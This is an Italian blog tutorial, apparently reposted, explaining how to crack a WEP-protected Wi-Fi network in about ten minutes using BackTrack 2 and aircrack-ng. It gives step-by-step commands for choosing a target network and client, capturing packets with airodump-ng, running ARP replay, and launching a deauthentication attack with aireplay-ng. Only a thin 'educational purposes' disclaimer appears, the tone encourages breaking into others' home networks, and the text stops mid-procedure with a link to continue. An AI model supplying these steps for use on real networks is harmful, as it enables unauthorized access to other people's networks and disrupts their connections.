Crackare una rete Wi-Fi WEP in 10 minuti
Quanti di voi hanno tentato, o almeno pensato, di crackare una rete wireless? Fino a poco fa era cosa da pochi e ci voleva comunque molto tempo, anche giorni o settimane in alcuni casi.
Da oggi invece, con aircrack può farlo praticamente chiunque, anche chi non ha esperienza con linux o di hacking in generale, grazie ad un attacco chiamato PTW.
Tutto quello che serve è una decina di minuti se siamo fortunati…
In verità serve anche avere linux, ma se siete incalliti utilizzatori di Windows non temete.
Esiste una particolare versione di Linux avviabile da CD, chiamata BackTrack 2 che fa proprio al caso nostro. BackTrack è un sistema Linux completamente funzionante, con tanto di interfaccia grafica, completo di tutti i tool per testare la sicurezza (e crackare) reti wireless.
Questo tipo di distribuzione è detta LIVE e non intacca in alcun modo il vostro sistema Windows. Vi basti sapere che una volta spento il PC potrete avviarlo normalmente come avete sempre fatto, senza aver perso nulla. Anche se avete intenzione di installare Linux vi consiglio caldamente di utilizzare comunque Backtrack2 per trovare una chiave WEP, in quanto già configurata per i nostri scopi e munita dei driver necessari.
Prima di tutto è mio dovere precisare che tutte le informazioni contenute in questo articolo sono state scritte solo a scopo didattico, per permettere agli utenti di testare la sicurezza della propria rete, pertanto non mi assumo alcuna responsabilità di eventuali usi illeciti di tali informazioni o di eventuali danni derivanti dall’utilizzo di software citato in quest’articolo (per quanto sia improbabile).
L’articolo sembrerà un po’ lungo da leggere, ma vedrete che i passaggi sono davvero pochi e semplici una volta capito il concetto. Ad ogni modo vi consiglio di leggerlo prima completamente e poi di agire.
PREMESSE
Esistono due tipi di protezioni wireless: WEP e WPA. Le reti con WPA non sembrano ad oggi vulnerabili ad attacchi sistematici, per cui ci concentreremo sulle reti con protezione WEP.
Ma adesso veniamo a noi. Rimarrete sconcertati da come sia facile crackare una rete domestica, anche tra le più diffuse, come ad esempio quelle di Alice ad esempio…
DI COSA ABBIAMO BISOGNO
BackTrack2
Aircrack-ng
Eventuali driver per linux della vostra scheda wireless. Se poi usate una distribuzione che non è BackTrack vi serviranno anche le patch per i vostri driver di rete.
LE “PARTI” COINVOLTE
AP – L’access point della rete che vogliamo crackare
TC – Target Client: Il computer connesso alla rete che vogliamo crackare
SC – Sniffing Client: Il computer che dovrà “captare” il traffico della suddetta rete.
AC – Attacking Client: Il computer che attaccherà a tutti gli effetti la rete.
E’ importante sapere che SC e AC possono essere lo stesso computer contemporaneamente, anche se sarebbe meglio utilizzare due schede di rete separate. Ad ogni modo, anche se ne avete solo una, potete tranquillamente arrangiarvi. A proposito di schede wireless c’è da dire che vanno sicuramente bene le schede basate su uno dei seguenti chipset: PRISM 2, PrismGT (FullMAC), Atheros, RTL8180, e Ralink. Purtroppo, come vedremo in seguito, le schede Intel 2200 b/g, attualmente ancora le più diffuse, danno qualche problema a cui però si può ovviare.
INIZIAMO
Passiamo alla fase operativa:
Prima di tutto mettete su una memoria USB i pacchetti aircrack e i driver della scheda di rete.
Poi stampate questa guida perché ci sarà da riavviare il computer con BackTrack2.
A questo punto masterizzate BackTrack2 su un CD e riavviate il computer con il supporto inserito.
Il computer impiegherà un paio di minuti ad accendersi, e vi chiederà di inserire nome utente e password per avviare BackTrack.
Digitate root e premete invio.
Poi digitate toor e premete invio.
E infine digitate startx e premete invio per avviare l’ambiente grafico del sistema.
Se siete neofiti, complimenti: state usando Linux!
I NOSTRI PROGRAMMI
I programmi con cui andremo a lavorare sono quelli della suite Aircrack-ng. Vediamo nel dettaglio a cosa servono, in modo da capire quali sono i passaggi chiave del cracking di una rete wireless.
Senza scendere in inutili tecnicismi dovete tener presente che quando una rete trasmette dei dati si dice che ha trasmesso un pacchetto.
In pratica per scoprire qual è la password di una rete WEP dobbiamo captare la maggior quantità possibile di pacchetti da questa rete e farla analizzare al nostro computer.
Airodump-ng Permette di raccogliere informazioni sulla rete, indirizzi MAC, canali, nomi eccetera, e ci consente di “sniffare” i pacchetti salvandoli in un file sul PC, anche in più riprese.
Aireplay-ng Serve a “stimolare” la rete, qualora il traffico non dovesse essere sufficiente a farci raccogliere il numero di pacchetti necessario.
Aircrack-ng E’ il programma che decripterà il traffico captato dalle reti e in pochi secondi e ci darà la chiave WEP.
INSTALLIAMO AIRCRACK
Aprite Konqueror (una delle icone sulla barra di avvio) e cliccate su “Home Folder”, oppure in alto digitate “/root” e premete invio.
Copiate il pacchetto di aircrack-ng nella Home Folder.
Aprite una finestra della console (simile al prompt dei comandi di MS DOS – o “cmd”). Se non sapete dove andare a prenderla andate sul menu di Start, Utility, Konsole.
Digitate uno ad uno questi comandi per installare aircrack-ng
tar -zxvf aircrack-ng-0.9.1.tar.gz
(rimpiazzare questo nome col nome del file di aircrack-ng, anche se non credo che sia diverso)
cd aircrack-ng-0.9.1
(utilizzare lo stesso nome inserito precedentemente, ma senza estensioni)
make
make install
Con BackTrack non dovreste avere problemi, ma potreste dover installare i driver della scheda di rete. Se utilizzate un’altra distribuzione dovrete farlo di sicuro. Per eventuali problemi contattatemi sul forum.
Benissimo. Ora che abbiamo installato tutto ciò che ci serve possiamo passare alla parte operativa…
SCEGLIAMO UNA RETE
Operazione da effettuare sullo Sniffing Client, cioè il computer a cui volete far catturare il traffico di rete.
Dalla console digitate iwconfig
Questo tool vi permette di conoscere i nomi che linux utilizza per tutte le schede di rete del vostro PC, compresa la wireless ovviamente, e il loro stato.
Di solito le schede wireless si chiamano wlan0 oppure wifi0.
Le schede Wireless sono facilmente indivuduabili in quanto viene indicato il protocollo “IEEE 802.11? accanto al nome della scheda.
Una volta individuato il nome della scheda wireless lanciate dalla console
airodump-ng [nomescheda].
Es.: airodump-ng wlan0
Si aprirà appunto il programma Airodump, che ci permette di ricavare tutte le informazioni di cui abbiamo bisogno su tutte le reti che riusciamo a captare.
Nel caso in cui il programma dovesse bloccarsi digitate airodump-ng [nomescheda] mode monitor.
Questo comando fa sì che la vostra scheda si limiti a captare le reti circostanti, senza trasmettere alcunché.
Adesso rieseguite tranquillamente airodump-ng.
Come potete vedere in figura ci sono 2 gruppi di informazioni. In alto ci sono le reti wireless che il programma ha trovato, e in basso una lista di client(computer) connessi a tali reti.
Le reti che possiamo crackare sono quelle che portano la dicitura WEP nella colonna ENC. Le reti OPN non hanno alcuna protezione, mentre per quelle WPA approfondiremo il discorso un’altra volta.
Il campo PWR ci indica la potenza di ricezione (e quindi la vicinanza della rete).
DATA, invece, indica il traffico utile generato dalla rete, cioè i pacchetti che potremmo utilizzare per scoprire la password.
Per scegliere la rete da craccare, quindi, dobbiamo assicurarci che abbia criptatura WEP e che ci sia almeno un client connesso (nella parte bassa della schermata). Se un client è connesso ad una rete troverete l’indirizzo MAC del client sotto il campo STATION e l’indirizzo MAC dell’access point a cui è connesso sotto il campo BSSID. Questo sarà il nostro Target Client.
Una volta individuata una rete WEP con abbastanza potenza di ricezione ed un client connesso possiamo raccogliere le informazioni di cui abbiamo bisogno, e cioè:
– BSSID (l’indirizzo MAC dell’access point della rete);
– CH (il canale su cui lavora la rete);
– STATION (l’indirizzo MAC) del TC.
Scrivete tutte queste informazioni su un foglio e premete CTRL+Z per fermare airodump.
Per sicurezza segnate anche l’ESSID della rete, alla fine vedremo il perché.
Vi ricordo che i ruoli di Sniffing Client e Attacking Client possono essere interpretati dallo stesso computer, ma è comunque consigliabile avere due schede wireless separate, anche se non indispensabile. Magari fatevi prestare una scheda USB o PCMCIA da un vostro amico.
Il motivo è che mentre l’AC penserà a “stimolare” la rete inviando migliaia e migliaia di pacchetti, lo SC dovrà captare tutto il traffico della rete e se la vostra scheda ha una sola antenna non può inviare e ricevere pacchetti contemporaneamente, con una conseguente perdita di tempo.
DEAUTH ATTACK
Ecco l’attacco vero e proprio, quello che ci farà crackare una WEP in pochissimi minuti.
Esistono anche altri tipi di attacchi, ma richiedono molto più tempo con risultati spesso non all’altezza delle aspettative.
Ecco cos’è un DEAUTH ATTACK, o attacco di deautenticazione: in pratica si tratta di “bombardare” il TC di pacchetti, in modo da farlo scollegare (appunto deauthenticate) dalla rete. Il TC tenterà subito di riconnettersi alla rete, inviando un pacchetto di autenticazione. Il nostro AC catturerà questo pacchetto e lo reinvierà alla rete migliaia e migliaia di volte, stimolando così la rete a creare traffico utile. Questo traffico verrà captato dallo SC e il gioco sarà praticamente fatto.
Ecco come procedere:
Sullo SC digitate:
iwconfig wlan0 mode monitor
(ovviamente al posto di “wlan0” inserite il nome della vostra scheda di rete)
e poi:
airodump-ng -w [nome_file_con_i_pacchetti] -c [canale_rete] –bssid [BSSID_rete] [nome_scheda_wireless]
Es.: airodump-ng -w prova -c 11 –bssid 00:XX:XX:XX:XX:XX wlan0
In questo modo il vostro computer sta sniffando il traffico della rete.
Sempre sul SC aprite un’altra finestra della console e digitate:
aireplay-ng -3 -b [BSSID_RETE] -h [MAC_TC] [nome_scheda_di_Rete]
Es.: aireplay-ng -3 -b 00:XX:XX:XX:XX:XX -h 00:YY:YY:YY:YY:YY wlan0
Il numero 3 sta ad indicare che il programma deve captare il pacchetto di autenticazione e replicarlo. Quest’azione è definita arpreplay..
Adesso dobbiamo utilizzare l’AC. Se i due computer coincidono aprite semplicemente un’altra console e scrivete:
aireplay-ng –deauth 15 -a [BSSID_RETE] -h [MAC_TC] [nome_scheda_di_rete]
Es.: aireplay-ng –deauth 15 -a 00:XX:XX:XX:XX:XX -h 00:YY:YY:YY:YY:YY wlan0
deauth indica il tipo di attacco che stiamo per fare
15 è il numero di pacchetti inviati per far scollegare il TC
-a è l’indirizzo MAC dell’access point della rete
-h è l’indirizzo MAC del TC
Continua a leggere su …. dylanblog.com
Il contenuto che hai inserito è protetto dal diritto d’autore, è ben scritto in fondo al sito, se vuoi puoi lasciare una parte di questo articolo ma non tutto in quanto google penalizzerebbe entrambi gli articoli visto che sono duplicati!